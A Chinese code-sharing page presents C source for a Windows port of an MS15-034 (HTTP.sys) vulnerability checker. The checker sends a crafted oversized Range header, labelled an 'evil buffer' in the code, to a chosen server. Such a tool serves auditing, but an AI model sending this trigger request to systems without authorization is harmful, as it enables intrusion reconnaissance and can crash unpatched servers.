首页 > 代码库 > HTTP.sys 远程执行代码验证工具
HTTP.sys 远程执行代码验证工具
漏洞信息:
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。这里将测试工具改成windows版本方便工作。
代码:
/* UNTESTED - MS15-034 Checker THE BUG: 8a8b2112 56 push esi 8a8b2113 6a00 push 0 8a8b2115 2bc7 sub eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca sbb ecx,edx 8a8b211b 51 push ecx 8a8b211c 50 push eax 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here */ #define WIN32_LEAN_AND_MEAN #include <windows.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <winsock2.h> #include <Ws2tcpip.h> #pragma comment(lib,"ws2_32.lib") int connect_to_server(char *ip,const int port) { int sockfd = 0, n = 0; //SOCKET sockSrv; struct sockaddr_in serv_addr; //初始化版本 WORD version(0); WSADATA wsadata; int socket_return(0); version = MAKEWORD(2,0); socket_return = WSAStartup(version,&wsadata); if (socket_return != 0) { return 0; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("\n Error : Could not create socket %d\n",GetLastError()); return 1; } memset(&serv_addr, ‘0‘, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; //serv_addr.sin_port = htons(80); serv_addr.sin_port = htons(port); if (inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0) { printf("\n inet_pton error occured\n"); return 1; } if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) { printf("\n Error : Connect Failed \n"); exit(-1); return 1; } return sockfd; } int main(int argc, char *argv[]) { int n = 0; int sockfd; char recvBuff[1024]; // Check server char request[] = "GET / HTTP/1.0\r\n\r\n"; // our evil buffer char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"; if (argc != 3) { printf("\n Usage: %s <ip of server> <port of server> \n",argv[0]); return 1; } printf("[*] Audit Started\n"); sockfd = connect_to_server(argv[1],atoi(argv[2])); send(sockfd, request, strlen(request),0); recv(sockfd, recvBuff, sizeof(recvBuff)-1,0); if (!strstr(recvBuff,"Microsoft")) { printf("[*] NOT IIS\n"); exit(1); } sockfd = connect_to_server(argv[1],atoi(argv[2])); send(sockfd, request1, strlen(request1),0); recv(sockfd, recvBuff, sizeof(recvBuff)-1,0); if (strstr(recvBuff,"Requested Range Not Satisfiable")) { printf("[!!] Looks VULN\n"); exit(1); } else if (strstr(recvBuff,"The request has an invalid header name")) { printf("[*] Looks Patched"); } else { printf("[*] Unexpected response, cannot discern patch status"); } return 0; }
测试截图:
HTTP.sys 远程执行代码验证工具
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。